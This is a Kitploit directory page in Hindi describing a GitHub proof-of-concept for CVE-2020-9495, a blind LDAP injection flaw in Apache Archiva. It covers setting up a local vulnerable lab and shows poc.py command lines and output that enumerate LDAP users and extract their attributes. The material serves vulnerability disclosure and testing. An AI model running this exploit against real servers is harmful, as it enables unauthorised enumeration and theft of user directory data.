Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-9495 — CVE-2020-9495 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, Apache Archiva में एक LDAP इंजेक्शन भेद्यता। यह LDAP उपयोगकर्ताओं की गणना करता है और ब्लाइंड इंजेक्शन के माध्यम से मनमानी विशेषता मानों को बाहर निकालता है। | Kitploit
उपकरण/GitHubGitHub/ggolawski/cve-2020-9495
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubggolawski/cve-2020-9495

CVE-2020-9495

CVE-2020-9495 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, Apache Archiva में एक LDAP इंजेक्शन भेद्यता। यह LDAP उपयोगकर्ताओं की गणना करता है और ब्लाइंड इंजेक्शन के माध्यम से मनमानी विशेषता मानों को बाहर निकालता है।

रिपॉजिटरी देखें
816 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2020-9495 PoC

CVE-2020-9495 एक मध्यम गंभीरता का LDAP इंजेक्शन भेद्यता है Apache Archiva के 2.2.5 से पहले के संस्करणों में। यह एक हमलावर को LDAP सर्वर पर मौजूद उपयोगकर्ताओं के किसी भी LDAP गुण मान प्राप्त करने की अनुमति देता है।

आधिकारिक Apache Archiva सलाह से:

archiva लॉगिन फॉर्म में विशेष मान प्रदान करके एक हमलावर कनेक्टेड LDAP सर्वर से उपयोगकर्ता गुण डेटा प्राप्त कर सकता है। कुछ वर्णों के साथ कनेक्टेड LDAP सर्वर पर उपयोगकर्ताओं को क्वेरी करने के लिए उपयोग किए जाने वाले LDAP फिल्टर को संशोधित करना संभव है। प्रतिक्रिया समय को मापकर, LDAP उपयोगकर्ता वस्तुओं से मनमाना गुण डेटा प्राप्त किया जा सकता है।

PoC

poc.py स्क्रिप्ट दर्शाती है कि कैसे एक अनधिकृत हमलावर Archiva के साथ एकीकृत LDAP सर्वर पर उपयोगकर्ताओं की गणना कर सकता है और किसी भी उपयोगकर्ता के किसी भी गुण का मान प्राप्त कर सकता है।

स्थानीय Archiva परीक्षण सर्वर

यदि आपके पास पहले से ही LDAP प्रमाणीकरण सक्षम Archiva सर्वर है तो इस चरण को छोड़ें।

  1. Archiva 2.2.4 डाउनलोड करें और इसे निकालें

    root@kitploit:~
    $ wget https://archive.apache.org/dist/archiva/2.2.4/binaries/apache-archiva-2.2.4-bin.tar.gz
    $ tar -zxf apache-archiva-2.2.4-bin.tar.gz
    
  2. OpenLDAP सर्वर चलाएं

    root@kitploit:~
    $ docker run -p 2389:389 --name my-openldap-container osixia/openldap:1.3.0
    
  3. users.ldif से LDAP में उपयोगकर्ताओं को आयात करें

    root@kitploit:~
    $ ldapadd -x -D "cn=admin,dc=example,dc=org" -w admin -H ldap://localhost:2389 -f users.ldif
    
  4. Archiva सर्वर चलाएं

    root@kitploit:~
    $ bin/archiva console
    
  5. वेब इंटरफ़ेस के माध्यम से LDAP प्रमाणीकरण सक्षम और कॉन्फ़िगर करें

उपयोगकर्ताओं की गणना करें

root@kitploit:~
$ ./poc.py --url http://127.0.0.1:8080
[INFO] Enumerating users from http://127.0.0.1:8080
[INFO] Calibration...
[INFO] Calibration done
admin1
admin2
admin3
admin4
admin5
admin6
admin7
user1
user2
user3
user4

admin1 उपयोगकर्ता के LDAP गुणों के मान प्राप्त करें

root@kitploit:~
$ ./poc.py --url http://127.0.0.1:8080 --user admin1 --attr mail
[INFO] Exfiltrating mail attribute of admin1 user from http://127.0.0.1:8080
[INFO] Calibration...
[INFO] Calibration done
[email protected]
root@kitploit:~
$ ./poc.py --url http://127.0.0.1:8080 --user admin1 --attr givenName
[INFO] Exfiltrating givenName attribute of admin1 user from http://127.0.0.1:8080
[INFO] Calibration...
[INFO] Calibration done
admin1
root@kitploit:~
$ ./poc.py --url http://127.0.0.1:8080 --user admin1 --attr sn
[INFO] Exfiltrating sn attribute of admin1 user from http://127.0.0.1:8080
[INFO] Calibration...
[INFO] Calibration done
last
टूल डाउनलोड करें